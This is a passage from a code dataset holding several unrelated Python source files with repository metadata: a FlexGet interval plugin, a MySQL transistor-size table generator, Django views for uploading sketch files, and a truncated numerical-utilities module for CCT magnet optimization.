datetime\nimport logging\n\nfrom flexget import options, plugin\nfrom flexget.config_schema import parse_interval\nfrom flexget.event import event\n\nlog = logging.getLogger('interval')\n\n\nclass PluginInterval(object):\n \"\"\"\n Allows specifying minimum interval for task execution.\n\n Format: [n] [minutes|hours|days|weeks]\n\n Example:\n\n interval: 7 days\n \"\"\"\n\n schema = {'type': 'string', 'format': 'interval'}\n\n @plugin.priority(255)\n def on_task_start(self, task, config):\n if task.options.learn:\n log.info('Ignoring task %s interval for --learn' % task.name)\n return\n last_time = task.simple_persistence.get('last_time')\n if not last_time:\n log.info('No previous run recorded, running now')\n elif task.options.interval_ignore:\n log.info('Ignoring interval because of --now')\n else:\n log.debug('last_time: %r' % last_time)\n log.debug('interval: %s' % config)\n next_time = last_time + parse_interval(config)\n log.debug('next_time: %r' % next_time)\n if datetime.datetime.now() < next_time:\n log.verbose('Interval %s not met on task %s. Use --now to override.' % (config, task.name))\n task.abort('Interval not met', silent=True)\n return\n log.debug('interval passed')\n task.simple_persistence['last_time'] = datetime.datetime.now()\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(PluginInterval, 'interval', api_ver=2)\n\n\n@event('options.register')\ndef register_parser_arguments():\n options.get_parser('execute').add_argument('--now', action='store_true', dest='interval_ignore', default=False,\n help='run task(s) even if the interval plugin would normally prevent it')\n", "repo_name": "bragatrosco/flexget", "sub_path": "lib/python2.7/site-packages/flexget/plugins/operate/interval.py", "file_name": "interval.py", "file_ext": "py", "file_size_in_byte": 2019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "flexget.config_schema.parse_interval", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flexget.plugin.priority", "line_number": 27, "usage_type": "call"}, {"api_name": "flexget.plugin", "line_number": 27, "usage_type": "name"}, {"api_name": "flexget.plugin.register", "line_number": 52, "usage_type": "call"}, {"api_name": "flexget.plugin", "line_number": 52, "usage_type": "name"}, {"api_name": "flexget.event.event", "line_number": 50, "usage_type": "call"}, {"api_name": "flexget.options.get_parser", "line_number": 57, "usage_type": "call"}, {"api_name": "flexget.options", "line_number": 57, "usage_type": "name"}, {"api_name": "flexget.event.event", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "31398289593", "text": "#!/usr/bin/env python3\n\n\n__version__ = '1.0.0'\n\nfrom ArkLibPy.ArkDBMySQL import ArkDBMySQL\nimport itertools\nimport sys\n\n\ndef gen_size_desc(tx_cnt, sizing_options):\n return itertools.product(sizing_options, repeat=tx_cnt)\n\n\ndef gen_sizes(tx_cnt, sizing_options):\n for size_desc in gen_size_desc(tx_cnt, sizing_options):\n str_size_desc = ''\n area = 0\n for size in size_desc:\n str_size_desc += str(size)\n area += int(size)\n yield 
str_size_desc, area\n\n\nif __name__ == '__main__':\n db_config = sys.argv[1]\n db = ArkDBMySQL(db_config_file=db_config)\n\n create_table_sql = 'CREATE TABLE IF NOT EXISTS `CADisCMOS`.`SIZE_LIB` (\\\n `idSIZE_LIB` INT NOT NULL AUTO_INCREMENT,\\\n `SIZE_DESC` VARCHAR(45) NOT NULL,\\\n `TX_CNT` INT NOT NULL,\\\n `SIZE_AREA` INT NULL,\\\n PRIMARY KEY (`idSIZE_LIB`))\\\n ENGINE = InnoDB'\n\n # create the SIZE_LIB table if it does not exist\n db.run_sql(create_table_sql)\n db.set_table('SIZE_LIB')\n\n for i in range(1, 8):\n rec = {'TX_CNT': i}\n for rec['SIZE_DESC'], rec['SIZE_AREA'] in gen_sizes(rec['TX_CNT'], [1, 2, 3, 4]):\n db.insert_nocommit(rec)\n db.commit()\n", "repo_name": "fangzhouwang/CADisCMOSExplorer", "sub_path": "size_lib.py", "file_name": "size_lib.py", "file_ext": "py", "file_size_in_byte": 1220, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "itertools.product", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ArkLibPy.ArkDBMySQL.ArkDBMySQL", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "6954095441", "text": "from django.shortcuts import render, redirect\nfrom django.core.files.storage import FileSystemStorage\nfrom django.forms import formset_factory\nfrom django.db import transaction\nfrom .models import Sketch, SketchFileUpload\nfrom .forms import SketchForm, ScriptUploadForm, FootageUploadForm, FinalVideoUploadForm\n\n# Test\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\n\ndef index(request):\n\n sketches_with_uploads = []\n\n sketches = Sketch.objects.all().prefetch_related('id__sketch_file_upload')\n\n for sketch in sketches:\n\n script_uploads = sketch.sketchfileupload_set.filter(type=\"SCRIPT\").all()\n footage_uploads = sketch.sketchfileupload_set.filter(type=\"FOOTAGE\").all()\n final_uploads = sketch.sketchfileupload_set.filter(type=\"FINAL\").all()\n\n sketch_with_upload = {\n \"id\": sketch.pk,\n \"title\": sketch.title,\n \"description\": sketch.description,\n \"script_uploads\": script_uploads,\n \"footage_uploads\": footage_uploads,\n \"final_uploads\": final_uploads \n }\n \n sketches_with_uploads.append(sketch_with_upload)\n\n return render(request, \"dashboard/index.html\",{ 'sketches': sketches_with_uploads })\n\ndef showsketch(request):\n\n # POST request\n if request.method == 'POST':\n\n sketch_form = SketchForm(request.POST, request.FILES)\n script_form = ScriptUploadForm(request.POST, request.FILES)\n footage_form = FootageUploadForm(request.POST, request.FILES)\n final_form = FinalVideoUploadForm(request.POST, request.FILES)\n\n forms_are_valid = (sketch_form.is_valid() and script_form.is_valid()\n and footage_form.is_valid() and final_form.is_valid())\n print(\"FORMS ARE VALID: \", forms_are_valid)\n\n if forms_are_valid:\n # Save all forms correctly\n sketch_form_val = sketch_form.save()\n # Take id from sketch_form_val and set to each\n # script, footage, and final form if they exist\n\n script_data = script_form.cleaned_data\n footage_data = footage_form.cleaned_data\n final_data = final_form.cleaned_data\n\n\n if script_data['file']:\n SketchFileUpload.objects.create(\n file=script_data['file'],\n type=\"SCRIPT\",\n sketch=sketch_form_val\n )\n\n if footage_data['file']:\n SketchFileUpload.objects.create(\n file=footage_data['file'],\n type=\"FOOTAGE\",\n sketch=sketch_form_val\n )\n\n if final_data['file']:\n SketchFileUpload.objects.create(\n 
file=final_data['file'],\n type=\"FINAL\",\n sketch=sketch_form_val\n )\n\n return redirect('index')\n else:\n print(\"Form is not valid\")\n\n # GET request\n else:\n \n sketch_form = SketchForm()\n script_form = ScriptUploadForm()\n footage_form = FootageUploadForm()\n final_form = FinalVideoUploadForm()\n\n context = {\n \"sketch_form\": sketch_form,\n \"script_form\": script_form,\n \"footage_form\": footage_form,\n \"final_form\": final_form,\n }\n\n return render(request, 'dashboard/sketch.html', context)\n\ndef edit_sketch(request, id):\n\n sketch = Sketch.objects.get(id=id)\n script_uploads = SketchFileUpload.objects.filter(sketch_id = id, type=\"SCRIPT\")\n footage_uploads = SketchFileUpload.objects.filter(sketch_id = id, type=\"FOOTAGE\")\n final_uploads = SketchFileUpload.objects.filter(sketch_id = id, type=\"FINAL\")\n\n if request.method == 'POST':\n filled_form = SketchForm(request.POST, instance = sketch)\n print(\"REQUEST POST: \", request.POST)\n print(\"REQUEST FILES: \", request.FILES)\n\n # Check form and deleted files\n for key, val in request.POST.items():\n if not val:\n continue \n\n if key == \"title\":\n sketch.title = val\n print(\"Title\", val)\n\n elif key == \"description\":\n sketch.description = val \n print(\"Description\", val)\n\n\n # Check file uploads (STILL NEED TO DO)\n for key, val in request.FILES.items():\n if key == \"new-script-file\":\n SketchFileUpload.objects.create(\n file=val,\n type=\"SCRIPT\",\n sketch=sketch\n )\n print(\"New Script File:\", val)\n\n elif key == \"new-footage-file\":\n SketchFileUpload.objects.create(\n file=val,\n type=\"FOOTAGE\",\n sketch=sketch\n )\n print(\"New Footage File:\", val)\n\n elif key == \"new-final-file\":\n with transaction.atomic():\n final_upload = SketchFileUpload.objects.create(\n type=\"FINAL\",\n sketch=sketch\n )\n final_upload.file.save(val.name, val)\n \n\n return redirect('index')\n else:\n \n sketch_form = SketchForm(instance = sketch)\n\n new_script_form = ScriptUploadForm(prefix=\"new-script\")\n new_footage_form = FootageUploadForm(prefix=\"new-footage\")\n new_final_form = FinalVideoUploadForm(prefix=\"new-final\")\n\n context = {\n \"sketch_form\": sketch_form,\n \"new_script_form\": new_script_form,\n \"new_footage_form\": new_footage_form,\n \"new_final_form\": new_final_form,\n \"script_uploads\": script_uploads,\n \"footage_uploads\": footage_uploads,\n \"final_uploads\": final_uploads,\n }\n\n return render(request, 'dashboard/edit_sketch.html', context)\n\ndef delete_sketch(request, id):\n sketch = Sketch.objects.get(id=id)\n uploads = SketchFileUpload.objects.filter(sketch_id = id)\n uploads.delete()\n sketch.delete()\n\n return redirect('index')\n\n\ndef delete_upload(request, sketch_id, upload_id):\n upload = SketchFileUpload.objects.get(id = upload_id)\n upload.delete()\n return redirect('/edit/' + str(sketch_id))\n", "repo_name": "BrianKozeny/prindiville-sketch-site", "sub_path": "django/dashboard/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6327, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.Sketch.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Sketch.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Sketch", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "forms.SketchForm", "line_number": 42, "usage_type": 
"call"}, {"api_name": "forms.ScriptUploadForm", "line_number": 43, "usage_type": "call"}, {"api_name": "forms.FootageUploadForm", "line_number": 44, "usage_type": "call"}, {"api_name": "forms.FinalVideoUploadForm", "line_number": 45, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 63, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 63, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 70, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 70, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 77, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 77, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 83, "usage_type": "call"}, {"api_name": "forms.SketchForm", "line_number": 90, "usage_type": "call"}, {"api_name": "forms.ScriptUploadForm", "line_number": 91, "usage_type": "call"}, {"api_name": "forms.FootageUploadForm", "line_number": 92, "usage_type": "call"}, {"api_name": "forms.FinalVideoUploadForm", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Sketch.objects.get", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Sketch.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Sketch", "line_number": 106, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.filter", "line_number": 107, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 107, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.filter", "line_number": 108, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 108, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 109, "usage_type": "name"}, {"api_name": "forms.SketchForm", "line_number": 112, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 133, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 133, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 141, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 141, "usage_type": "name"}, {"api_name": "django.db.transaction.atomic", "line_number": 149, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 149, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.create", "line_number": 150, "usage_type": "call"}, {"api_name": 
"models.SketchFileUpload.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 150, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 157, "usage_type": "call"}, {"api_name": "forms.SketchForm", "line_number": 160, "usage_type": "call"}, {"api_name": "forms.ScriptUploadForm", "line_number": 162, "usage_type": "call"}, {"api_name": "forms.FootageUploadForm", "line_number": 163, "usage_type": "call"}, {"api_name": "forms.FinalVideoUploadForm", "line_number": 164, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 176, "usage_type": "call"}, {"api_name": "models.Sketch.objects.get", "line_number": 179, "usage_type": "call"}, {"api_name": "models.Sketch.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "models.Sketch", "line_number": 179, "usage_type": "name"}, {"api_name": "models.SketchFileUpload.objects.filter", "line_number": 180, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 180, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 184, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects.get", "line_number": 188, "usage_type": "call"}, {"api_name": "models.SketchFileUpload.objects", "line_number": 188, "usage_type": "attribute"}, {"api_name": "models.SketchFileUpload", "line_number": 188, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 190, "usage_type": "call"}]} +{"seq_id": "72963662913", "text": "\"\"\"\nCCT 建模优化代码\n基本工具\n\n作者:赵润晓\n日期:2021年4月24日\n\"\"\"\n\nimport multiprocessing # since v0.1.1 多线程计算\nimport time # since v0.1.1 统计计算时长\nfrom typing import Any, Callable, Dict, Generic, Iterable, List, NoReturn, Optional, Tuple, TypeVar, Union\nimport matplotlib.pyplot as plt\nimport math\nimport random # since v0.1.1 随机数\nimport sys\nimport os # since v0.1.1 查看CPU核心数\nimport numpy\nfrom scipy.integrate import solve_ivp # since v0.1.1 ODE45\nimport warnings # since v0.1.1 提醒方法过时\nfrom packages.constants import *\nfrom packages.point import P2, P3\n\n\nclass BaseUtils:\n \"\"\"\n 这里存放一些简单的工具,如\n 1. 判断两个对象是否相等\n 2. numpy 中用于生成均匀分布的 linspace 方法\n 3. 角度转弧度 angle_to_radian 和 弧度转角度 radian_to_angle\n 4. 打印函数调用栈 print_traceback (这个主要用于 debug)\n 5. 
椭圆。用于生成椭圆圆周上均匀分布的若干点\n \"\"\"\n\n @staticmethod\n def equal(\n a: Union[float, int, P2, P3],\n b: Union[float, int, P2, P3],\n err: float = 1e-6,\n msg: Optional[str] = None,\n ) -> bool:\n \"\"\"\n 判断 a b 是否相等,相等返回 true\n 当 a b 不相等时,若 msg 为空,返回 flase,否则抛出异常,异常信息即 msg\n\n 因此这个函数不仅可以用来判断相等,还可以作为 assert\n \"\"\"\n if (isinstance(a, float) or isinstance(a, int)) and (\n isinstance(b, float) or isinstance(b, int)\n ):\n if (\n a == b\n or abs(a - b) <= err\n or ((a + b != 0.0) and ((2 * abs((a - b) / (a + b))) <= err))\n ):\n return True\n else:\n if msg is None:\n return False\n else:\n raise AssertionError(msg)\n elif (isinstance(a, P2) and isinstance(b, P2)) or (\n isinstance(a, P3) and isinstance(b, P3)\n ):\n if a.__eq__(b, err=err, msg=msg):\n return True\n else:\n if msg is None:\n return False\n else:\n raise AssertionError(msg)\n else:\n if a == b:\n return True\n else:\n if msg is None:\n return False\n else:\n raise AssertionError(msg)\n\n @staticmethod\n def linspace(\n start: Union[float, int, P2, P3], end: Union[float, int, P2, P3], number: int\n ) -> List[Union[float, P2, P3]]:\n \"\"\"\n 同 numpy 的 linspace\n \"\"\"\n # 除法改成乘法以适应 P2 P3 对象\n d = (end - start) * (1 / (number - 1))\n # i 转为浮点以适应 P2 P3 对象\n return [start + d * float(i) for i in range(number)]\n\n @staticmethod\n def angle_to_radian(\n deg: Union[float, int, List[Union[float, int]]]\n ) -> Union[float, List[float]]:\n \"\"\"\n 角度值转弧度制\n 对于单个角度,或者角度数组都可以使用\n \"\"\"\n if isinstance(deg, float) or isinstance(deg, int):\n return deg / 180.0 * math.pi\n elif isinstance(deg, List):\n return [BaseUtils.angle_to_radian(d) for d in deg]\n else:\n raise NotImplementedError\n\n @staticmethod\n def radian_to_angle(\n rad: Union[float, int, List[Union[float, int]]]\n ) -> Union[float, List[float]]:\n \"\"\"\n 弧度制转角度制\n 对于单个弧度,或者弧度数组都可以使用\n \"\"\"\n if isinstance(rad, float) or isinstance(rad, int):\n return rad * 180.0 / math.pi\n elif isinstance(rad, List):\n return [BaseUtils.radian_to_angle(d) for d in rad]\n elif isinstance(rad, numpy.ndarray):\n return numpy.array([BaseUtils.radian_to_angle(d) for d in rad])\n else:\n raise NotImplementedError\n\n @staticmethod\n def circle_center_and_radius(p1: P2, p2: P2, p3: P2) -> Tuple[P2, float]:\n \"\"\"\n 已知三个二维点 p1 p2 p3\n 求由这三个点组成的圆的圆心和半径\n 方法来自:https://blog.csdn.net/liutaojia/article/details/83625151\n \"\"\"\n x1 = p1.x\n x2 = p2.x\n x3 = p3.x\n y1 = p1.y\n y2 = p2.y\n y3 = p3.y\n z1 = x2 ** 2 + y2 ** 2 - x1 ** 2 - y1 ** 2\n z2 = x3 ** 2 + y3 ** 2 - x1 ** 2 - y1 ** 2\n z3 = x3 ** 2 + y3 ** 2 - x2 ** 2 - y2 ** 2\n A = numpy.array(\n [[(x2 - x1), (y2 - y1)], [(x3 - x1), (y3 - y1)], [(x3 - x2), (y3 - y2)]]\n )\n B = 0.5 * numpy.array([[z1], [z2], [z3]])\n c = numpy.linalg.inv(A.T @ A) @ A.T @ B\n c = P2.from_numpy_ndarry(c)\n # c = (A'*A)\\A'*B;\n R1 = math.sqrt((c.x - x1) ** 2 + (c.y - y1) ** 2)\n R2 = math.sqrt((c.x - x2) ** 2 + (c.y - y2) ** 2)\n R3 = math.sqrt((c.x - x3) ** 2 + (c.y - y3) ** 2)\n R = (R1 + R2 + R3) / 3\n return c, R\n\n @staticmethod\n def polynomial_fitting(xs: List[float], ys: List[float], order: int) -> List[float]:\n \"\"\"\n 多项式拟合\n xs 自变量数组\n ys 因变量数组\n order 拟合阶数\n\n 返回一个数组\n 数组第 0 项为拟合常数项\n 数组第 i 项为拟合 i 次项\n \"\"\"\n fit = numpy.polyfit(xs, ys, order)\n return fit[::-1].tolist()\n\n @staticmethod\n def polynomial_fitted_function(coefficient_list: List[float]) -> Callable[[float], float]:\n \"\"\"\n 将多项式拟合结果:系数数组 coefficient_list\n 转为\n \"\"\"\n def f(x: float) -> float:\n # 常数项\n y = coefficient_list[0]\n for i in range(1, len(coefficient_list)):\n 
coefficient = coefficient_list[i]\n y += coefficient * (x ** i)\n return y\n\n return f\n\n @staticmethod\n def list_multiply(\n li: Union[List[int], List[float], List[P2], List[P3]], number: Union[int, float]\n ) -> Union[List[int], List[float], List[P2], List[P3]]:\n \"\"\"\n 让数组中每个元素都乘以一个数\n \"\"\"\n return [e * number for e in li]\n\n @staticmethod\n def derivative(func: Callable[[float], Union[float, P2, P3]],\n delta: float = 1e-7) -> Callable[[float], Union[float, P2, P3]]:\n \"\"\"\n 函数 func 求导,微分\n delta 即 Δ,f' = (f(x+Δ)-f(x))/Δ\n \"\"\"\n def d(x: float) -> Union[float, P2, P3]:\n return (func(x+delta/2)-func(x-delta/2))/delta\n\n return d\n\n @staticmethod\n def interpolate_lagrange(x: float, x0: float, y0: float,\n x1: float, y1: float, x2: float, y2: float, x3: float, y3: float,\n error: float = 1e-8) -> float:\n \"\"\"\n 拉格朗日插值法 4 个点\n 利用四点 (x0,y0) (x1,y1) (x2,y2) (x3,y3) 多项式插值,f(x)\n 返回 x 对应的 y,即 f(x)\n\n 当 x 和 xi 的差小于 error 时,直接返回 yi,既是为了快速计算,也是为了防止后面公式中除0\n\n since v0.1.3 这个函数引入,为了计算 opera 导出的磁场表格数据,在任意一点的磁场\n \"\"\"\n if abs(x-x0) < error:\n return y0\n if abs(x-x1) < error:\n return y1\n if abs(x-x2) < error:\n return y2\n if abs(x-x3) < error:\n return y3\n\n t0 = (x - x1)*(x - x2)*(x - x3)*y0 / ((x0 - x1)*(x0 - x2)*(x0 - x3))\n t1 = (x - x0)*(x - x2)*(x - x3)*y1 / ((x1 - x0)*(x1 - x2)*(x1 - x3))\n t2 = (x - x0)*(x - x1)*(x - x3)*y2 / ((x2 - x0)*(x2 - x1)*(x2 - x3))\n t3 = (x - x0)*(x - x1)*(x - x2)*y3 / ((x3 - x0)*(x3 - x1)*(x3 - x2))\n\n tt = t0 + t1 + t2 + t3\n\n if math.isnan(tt):\n print(\n f\"error in interpolate_lagrange params={x},{x0},{y0},{x1},{y1},{x2},{y2},{x3},{y3}\")\n return 0.0\n\n return tt\n\n @staticmethod\n def is_sorted(li: List) -> bool:\n \"\"\"\n 判断数组是否有序(从大到小排列)\n 这个方法来自 https://www.zhihu.com/question/368573897\n 虽然无法快速退出,但很简洁\n \"\"\"\n return all([li[i] <= li[i + 1] for i in range(len(li) - 1)])\n\n @staticmethod\n def print_traceback() -> None:\n \"\"\"\n 打印函数调用栈\n 用于 debug\n -------\n\n \"\"\"\n f = sys._getframe()\n while f is not None:\n print(f)\n f = f.f_back\n\n @staticmethod\n def runge_kutta4(\n t0: float,\n t_end: float,\n Y0: T,\n y_derived_function: Callable[[float, T], T],\n dt: float,\n record: bool = False\n ) -> Union[T, Tuple[List[float], List[T]]]:\n \"\"\"\n 4 阶 runge kutta 法求解微分方程组\n t0 自变量起始值\n t_end 自变量终值\n Y0 方程在 t0 处的值\n y_derived_function 函数 Y' = f(x,Y)\n dt 计算步长\n record 是否返回每一步的结果\n 如若是,返回 自变量 t 数组和 Y 数组\n 否,则返回 t_end 处 Y(t) 值\n since v0.1.1\n \"\"\"\n number: int = math.ceil((t_end - t0) / dt)\n dt = (t_end - t0) / float(number)\n\n if record:\n ts = [t0]\n Ys = [Y0]\n for ignore in range(number):\n k1 = y_derived_function(t0, Y0)\n k2 = y_derived_function(t0 + dt / 2, Y0 + dt / 2 * k1)\n k3 = y_derived_function(t0 + dt / 2, Y0 + dt / 2 * k2)\n k4 = y_derived_function(t0 + dt, Y0 + dt * k3)\n\n t0 = t0 + dt\n Y0 = Y0 + (dt / 6) * (k1 + 2 * k2 + 2 * k3 + k4)\n ts.append(t0)\n Ys.append(Y0)\n return (ts, Ys)\n else:\n for ignore in range(number):\n k1 = y_derived_function(t0, Y0)\n k2 = y_derived_function(t0 + dt / 2, Y0 + dt / 2 * k1)\n k3 = y_derived_function(t0 + dt / 2, Y0 + dt / 2 * k2)\n k4 = y_derived_function(t0 + dt, Y0 + dt * k3)\n\n t0 += dt\n Y0 += (dt / 6) * (k1 + 2 * k2 + 2 * k3 + k4)\n\n return Y0\n\n @staticmethod\n def solve_ode(\n t0: float,\n t_end: float,\n Y0: List[float],\n y_derived_function: Callable[[float, List[float]], List[float]],\n dt: float,\n record: bool = False,\n absolute_tolerance: float = 1e-8,\n relative_tolerance: float = 1e-8\n ) -> numpy.ndarray: # 二维数组\n \"\"\"\n scipy 中 
ode45\n 即变步长 4 阶 runge kutta 法\n since v0.1.1\n\n Y 必须是一维组形式,即 Y = [y0, y1, y2....]\n\n 返回值 ret 是一个二维数组\n ret[0][-1] 是 y0 在 t_end 的值\n ret[1][-1] 是 y1 在 t_end 的值\n ret[2][-1] 是 y2 在 t_end 的值\n 。。。。。。\n \"\"\"\n if record:\n raise NotImplementedError\n # number: int = math.ceil((t_end-t0)/dt)\n # t_eval = numpy.linspace(t0, t_end, number)\n # s = solve_ivp(y_derived_function, [\n # t0, t_end], Y0, t_eval=t_eval, rtol=1e-8, atol=1e-8, first_step=dt, max_step=dt)\n else:\n s = solve_ivp(y_derived_function, [\n t0, t_end], Y0, rtol=relative_tolerance, atol=absolute_tolerance, first_step=dt, max_step=dt)\n return s.y\n\n # 多进程安全提示 since v0.1.1\n __I_AM_SURE_MY_CODE_CLOSED_IN_IF_NAME_EQUAL_MAIN: bool = False\n\n # 子线程名字,用于判断当前进程是不是子进程\n # _CHILD_PROCESS_NAME:str = 'CCTPY_CHILD_PROCESS'\n\n @classmethod\n def i_am_sure_my_code_closed_in_if_name_equal_main(cls):\n \"\"\"\n 多线程安全提示\n since v0.1.1\n \"\"\"\n cls.__I_AM_SURE_MY_CODE_CLOSED_IN_IF_NAME_EQUAL_MAIN = True\n\n # @staticmethod\n # def _set_current_process_name(name:str)->None:\n # \"\"\"\n # 设置当前进程名字\n # \"\"\"\n # multiprocessing.current_process().name = name\n\n @classmethod\n def submit_process_task(cls,\n task: Callable[..., T],\n param_list: List[List],\n concurrency_level: Optional[int] = None,\n report: bool = True,\n i_want_to_create_process_pool_in_child_process: bool = False\n ) -> List[T]:\n \"\"\"\n 提交任务多进程并行\n task 要运行的任务,是一个函数\n T 任务返回值\n param_list 任务参数数组,数组每个元素表示一个 task 的输出组合\n concurrency_level 并发等级,默认为 CPU 核心数\n report 是否报告耗时\n\n\n 因为 python 具有全局解释器锁,所以 CPU 密集任务无法使用线程加速,只能使用进程\n see https://www.cnblogs.com/dragon-123/p/10247252.html\n\n since v0.1.1\n \"\"\"\n # 确定当前进程池是否由主进程创建\n current_pool_is_create_by_main_process = False\n cpn = multiprocessing.current_process().name.upper()\n if cpn.find(\"POOL\") == -1:\n current_pool_is_create_by_main_process = True\n else:\n if not i_want_to_create_process_pool_in_child_process:\n print(\"警告:\")\n print(\"检测到子进程执行 submit_process_task 函数\")\n print(\"这可能导致异常\")\n\n # 有两种情况会创建进程池\n # 1 执行此函数的进程为主进程\n # 2 参数 i_want_to_create_process_pool_in_child_process 为 True,即用户要求在子进程中创建进程池\n # i_want_to_create_process_pool_in_child_process 默认值为 False\n # 也就是说,默认情况下,不允许在子进程中创建进程池\n if i_want_to_create_process_pool_in_child_process or current_pool_is_create_by_main_process:\n\n if not cls.__I_AM_SURE_MY_CODE_CLOSED_IN_IF_NAME_EQUAL_MAIN:\n # 删除激进的报错方式\n # raise PermissionError(\n # \"在使用CPU并行计算前,应确保你的脚本写在if __name__ == '__main__':\"\n # + \"代码块内部,并显式调用BaseUtils.i_am_sure_my_code_closed_in_if_name_equal_main()函数\"\n # )\n print(\"警告:\")\n print(\"当前你正在进行 CPU 并行计算。如果你的脚本没有被\")\n print(\"if __name__ == '__main__':\")\n print(\"包裹起来,可能会发生意外。\")\n print(\"如果出现意外情况,请加上 if __name__ == '__main__': \")\n\n if concurrency_level is None:\n concurrency_level = os.cpu_count()\n if concurrency_level <= 0:\n raise ValueError(\n f\"concurrency_level = {concurrency_level} 值应大于0\")\n if report:\n print(f\"处理并行任务,任务数目{len(param_list)},并行等级{concurrency_level}\")\n start = time.time()\n pool = multiprocessing.Pool(\n processes=concurrency_level\n ) # 开启一次性进程池\n r = pool.starmap(task, param_list) # 执行任务\n pool.close() # 停止接受任务\n pool.join() # 等待完成\n if report:\n print(f\"任务完成,用时{time.time() - start}秒\")\n return r\n else:\n # 这个分支不应该进入\n print(\"警告:\")\n print(\"检测到子进程执行 submit_process_task 函数\")\n print(\"这可能导致异常,已自动终止这一行为\")\n print(\"如果 submit_process_task 需要在子进程中执行,请传入参数\")\n print(\"i_want_to_create_process_pool_in_child_process = True\")\n\n class Ellipse:\n \"\"\"\n 椭圆类\n Ax^2+Bxy+Cy^2=D\n \"\"\"\n\n def 
__init__(self, A: float, B: float, C: float, D: float):\n self.A = float(A)\n self.B = float(B)\n self.C = float(C)\n self.D = float(D)\n\n def __eq__(self, other: 'BaseUtils.Ellipse') -> bool:\n \"\"\"\n 椭圆相等判断\n 注意:因为 A B C D 具有放大不变性,所以判断为不等的椭圆,有可能是相等的\n\n since v0.1.4\n \"\"\"\n return (\n self.A == other.A and\n self.B == other.B and\n self.C == other.C and\n self.D == other.D\n )\n\n def __hash__(self) -> int:\n \"\"\"\n hash 方法,因为需要将椭圆当作字典的键\n\n since v0.1.4\n \"\"\"\n return hash((self.A, self.B, self.C, self.D))\n\n def point_at(self, theta: float) -> P2:\n \"\"\"\n 原点出发,方向th弧度的射线和椭圆Ax^2+Bxy+Cy^2=D的交点\n Parameters\n ----------\n theta 弧度\n\n Returns 方向th弧度的射线和椭圆Ax^2+Bxy+Cy^2=D的交点\n -------\n\n \"\"\"\n d = P2()\n\n while theta < 0:\n theta += 2 * math.pi\n\n while theta > 2 * math.pi:\n theta -= 2 * math.pi\n\n if BaseUtils.equal(theta, 0) or BaseUtils.equal(theta, 2 * math.pi):\n d.x = math.sqrt(self.D / self.A)\n d.y = 0\n\n if BaseUtils.equal(theta, math.pi):\n d.x = -math.sqrt(self.D / self.A)\n d.y = 